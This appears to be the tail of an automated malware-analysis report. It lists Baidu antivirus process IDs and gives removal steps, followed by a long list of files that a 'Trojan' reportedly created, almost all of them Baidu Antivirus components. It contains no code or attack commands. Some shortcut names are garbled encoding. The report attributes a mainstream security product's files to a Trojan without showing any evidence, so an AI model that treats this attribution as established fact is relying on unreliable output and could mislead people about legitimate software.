BDALeakfixer.exe:3188
BaiduAn.exe:3824
BaiduAn.exe:1952
BaiduSdBugRpt.exe:2180
BaiduSdUpdate.exe:2680
BaiduSdUpdate.exe:2228
BaiduAnSvc.exe:3768
BaiduAnSvc.exe:3664
BaiduSdSvc.exe:1500
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPatchAgent.dll (3104 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDUDiskGuard.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerXMLScript.dat (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ad.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSd.exe (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\res\InstallWnd.zip (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDCooly.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVMC.rdb (5520 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_customer.xml (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tips.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\TrustAndIso.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsUpdate.exe (37 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ToastLogo.ico (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vcrt.msi (22552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDPerflog.dll (10512 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMStringUtils.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BSRLib.dat (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bdcomproxy.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDLogicUtils.dll (16864 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\811.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (1287722 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\NetService.ini (615 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\baidusdRepair.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRmvDevPlugin.dll (8560 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe (9605 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUProxy64.exe (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray\TrayPlugin.rdb (18424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDDriverFixer.dll (1281 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMNet.dll (5873 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsIU.dll (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSREng.dll (10136 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\CompatibilityChecker.dll (673 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\bdcomproxy.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMPatchAgent.dll (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\UserDetectionPlugin.dll (5520 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\systemfile.dat (3 bytes)
%System%\config (576 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\806.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe (7385 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\HIPSClient.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWindowsLib.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDPerflog.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\monitor_config.dat (559 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0001.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDKitUtils.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.dll (4992 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Repair_PluginConfig.xml (411 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVRtp_PluginConfig.xml (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\virus_type.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\bduf.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrayPluginContainerConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\810.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUpdate.exe (33263 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVWsc.exe (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\GetSupplyId.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.sys (13168 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavFrame.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect_x64.dll (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0001.sys (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMWindowsLib.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMLog.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDLogicUtils.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrustAndIso.dll (13440 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanV.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastLogo.ico (12024 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\blacksign.dat (852 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vatl.msi (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\RepairPluginContainerConfig.xml (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSRCore.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVFixerConfigMgr.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\804.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonHook.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\InstallCfg.xml (177 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0002.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GameNoDisturb.ini (215 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\uninst.exe (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsIU.dll (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDUDiskGuard.dll (7192 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tuopan.png (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMStringUtils.dll (63 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0001.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDPerflog.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\RtpContainerConfig.xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\806.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDownload.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDLogicUtils.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\TrustAndIso.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMFrameWork.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt64.dll (2321 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_customer.xml (75 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\cache_config.dat (469 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSDWrench.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand.dll (5064 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMFrameWork.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\NetService.ini (1230 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayDldProtect.rdb (3616 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0001.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMPatchAgent.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\PrivacyProtect.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\BDMSkin.dll (37727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHips.exe (38495 bytes)
%System%\config\system (2566 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\KVInstallHelper.dll (16424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\white_list.dat (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVUpdate.rdb (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\901.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastImage.png (5 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch.7z (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerLuaScript.dat (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDLogicUtils.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDArKit.sys (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerConfig.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVCached.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMNet.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanH.dll (1856 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdmp.dat (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\updlog.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\kav_verify.dat (677 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vcrt.msi (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSkin.dll (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RtpContainerConfig.xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDownLoadProtectPlugin.dll (16288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVCached.dll (23584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSREng.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\monitor_config.dat (559 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerConfig.dat (1 bytes)
%Documents and Settings%\All Users\Desktop\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢.lnk (895 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDArKit.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsBugRpt.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonHook.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMDownload.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\systemfile.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vatl.msi (6584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCCallbackBind.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Cooly_PluginConfig.xml (726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSDWrench.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\DesktopToast.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepMgr.dll (12088 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdSvc.exe (27704 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\coolyplugins\CoolyContainerConfig.xml (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVTrayTipsPlugin.dll (6584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPullUpWS.rdb (3616 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMScriptVM.dll (1281 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVVirusPlugins.dll (12088 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\KavUpdate.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RepairPluginContainerConfig.xml (228 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdmp.dat (32 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\kav_verify.dat (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVRtp_PluginConfig.xml (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanH.dll (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafePlugin.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\uninst.exe (29256 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPlugin.rdb (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0003.sys (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMPatchAgent.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDbSqlite.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\duilib license.txt (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMLog.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDConfig.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray.rdb (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\TrustAndIso.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CoolyContainerConfig.xml (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\fm.dat (597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DriverManager.dll (8608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\white_list.dat (12088 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsIU.dll (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTips.rdb (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsBugRpt.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUProxy64.exe (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanS.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\900.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Cooly_PluginConfig.xml (726 bytes)
%System%\drivers\bd0003.sys (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\systemfile.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMBase.dll (7345 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCScriptBind.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\FileMon.dll (21216 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\DriverManager.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKitUtils.dll (2392 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\dl.dll (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMUpdate.dll (12104 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKV.rdb (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\DllInject.dll (43 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\iexplore.exe.xml (528 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\809.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\dl.dll (65930 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\SearchProtection.rdb (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\tuopan.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDownload.dll (15336 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanM.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0001.sys (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\scan_mgr_config.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt64.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\ccesign.dat (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMMsg.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVQuarantine.rdb (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\virus_type.dat (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVCached.dll (1425 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢.lnk (907 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMBase.dll (7345 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMMsg.dll (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.dll (16424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMUpdate.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanM.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMEvents.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\wverify.dat (132336 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand64.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\TrayPluginContainerConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\900.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDConfig.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVRecomm.dll (13122 bytes)
%System%\drivers\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMLog.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMReport.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BSRLib.dat (673 bytes)
%System%\config\SYSTEM.LOG (5938 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMBase.dll (32128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCallbackBind.dll (1552 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢\ÃƒÂ¥Ã‚ÂÃ‚Â¸ÃƒÂ¨Ã‚Â½Ã‚Â½ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢.lnk (880 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCScriptBind.dll (32128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PrivacyProtect.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\iexplore.exe.xml (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\directui license.txt (593 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\KVMainframePluginContainerConfig.xml (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\HIPSClient.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect_x64.dll (6360 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\tips.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdRepair.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\putips_wording.dat (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRecomm.dll (58402 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\InstallCfg.xml (177 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\cache_config.dat (469 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\KVCommonRes.rdb (131925 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafe.dll (7547 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVWsc.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsUpdate.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepBase.dll (30968 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\901.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMDownload.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsClient.xml (18 bytes)
